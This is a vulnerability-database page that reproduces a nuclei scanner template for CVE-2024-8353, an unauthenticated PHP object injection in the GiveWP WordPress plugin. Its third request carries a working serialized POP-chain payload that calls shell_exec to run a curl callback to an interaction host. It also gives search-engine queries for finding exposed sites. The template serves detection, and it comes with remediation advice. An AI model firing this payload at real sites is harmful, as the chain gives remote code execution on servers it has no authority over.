Lucene search
K

GiveWP Donation Plugin <= 3.16.1 - Unauthenticated PHP Object Injection

🗓️ 06 Jul 2026 03:02:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 27 Views

GiveWP Plugin up to 3.16.1 has unauthenticated PHP object injection risking full site compromise.

Related
Refs
Code
id: CVE-2024-8353

info:
  name: GiveWP Donation Plugin <= 3.16.1 - Unauthenticated PHP Object Injection
  author: hnd3884
  severity: critical
  description: |
    The GiveWP – Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.16.1. This is due to insufficient input validation on user-supplied data. An unauthenticated attacker can inject a serialized PHP object, which may allow them to execute arbitrary PHP code, depending on the presence of a suitable POP chain on the target system. This vulnerability could lead to full site compromise.
  impact: |
    Unauthenticated attackers can inject serialized PHP objects to execute arbitrary PHP code through POP chains, potentially achieving full site compromise, complete server control, and access to all WordPress data.
  remediation: |
    Update GiveWP plugin to version 3.16.2 or later to address the PHP object injection vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-8353
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/give/givewp-donation-plugin-and-fundraising-platform-3161-unauthenticated-php-object-injection
    - https://plugins.trac.wordpress.org/browser/give/trunk/readme.txt
    - https://plugins.trac.wordpress.org/browser/give/tags/3.16.0/includes/process-donation.php#L154
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2024-8353
    cwe-id: CWE-502
    epss-score: 0.28931
    epss-percentile: 0.97919
    cpe: cpe:2.3:a:givewp:givewp:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    vendor: givewp
    product: givewp
    framework: wordpress
    shodan-query: http.html:"/wp-content/plugins/give/"
    fofa-query: body="/wp-content/plugins/give/"
    publicwww-query: "/wp-content/plugins/give/"
  tags: cve,cve2024,wordpress,wp,wp-plugin,givewp,rce,unauth,vkev,vuln

variables:
  cmd: "curl+http://test.{{interactsh-url}}"
  length: "{{len(cmd)}}"
  cred: "{{rand_text_alpha(8)}}"

flow: http(1) && http(2) && http(3)

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=give_form_search

    extractors:
      - type: json
        name: id
        json:
          - ".[0].id"
        internal: true

  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=give_donation_form_nonce&give_form_id={{id}}

    extractors:
      - type: json
        name: nonce
        json:
          - ".data"
        internal: true

  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        give-form-id={{id}}&give-form-hash={{nonce}}&give-price-id=0&give-amount=10&give_first={{cred}}&give_last={{cred}}&give_email={{cred}}%40example.org&give_title=%5CO%3A19%3A%22Stripe%5C%5C%5C%5CStripeObject%22%3A1%3A%7Bs%3A10%3A%22%5C0%2A%5C0_values%22%3Ba%3A1%3A%7Bs%3A3%3A%22foo%22%3BO%3A62%3A%22Give%5C%5C%5C%5CPaymentGateways%5C%5C%5C%5CDataTransferObjects%5C%5C%5C%5CGiveInsertPaymentData%22%3A1%3A%7Bs%3A8%3A%22userInfo%22%3Ba%3A1%3A%7Bs%3A7%3A%22address%22%3BO%3A4%3A%22Give%22%3A1%3A%7Bs%3A12%3A%22%5C0%2A%5C0container%22%3BO%3A33%3A%22Give%5C%5C%5C%5CVendors%5C%5C%5C%5CFaker%5C%5C%5C%5CValidGenerator%22%3A3%3A%7Bs%3A12%3A%22%5C0%2A%5C0validator%22%3Bs%3A10%3A%22shell_exec%22%3Bs%3A12%3A%22%5C0%2A%5C0generator%22%3BO%3A34%3A%22Give%5C%5C%5C%5COnboarding%5C%5C%5C%5CSettingsRepository%22%3A1%3A%7Bs%3A11%3A%22%5C0%2A%5C0settings%22%3Ba%3A1%3A%7Bs%3A8%3A%22address1%22%3Bs%3A{{length}}%3A%22{{cmd}}%22%3B%7D%7Ds%3A13%3A%22%5C0%2A%5C0maxRetries%22%3Bi%3A10%3B%7D%7D%7D%7D%7D%7D&give-gateway=offline&action=give_process_donation

    matchers:
      - type: dsl
        dsl:
          - contains(interactsh_protocol, 'dns')
          - contains(content_type, "text/html")
          - status_code == 500
        condition: and
# digest: 4a0a00473045022100cfe0d855448c4b1e502e25e8fd08ee01a5a79708766b4eee1e78e766db9efeb002201cf1608e3463b03f52fbfff49236fa0de62d7893cd01e93a147dee7f8fa60727:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.5High risk
Vulners AI Score7.5
CVSS 3.19.8 - 10
EPSS0.28931
SSVC
27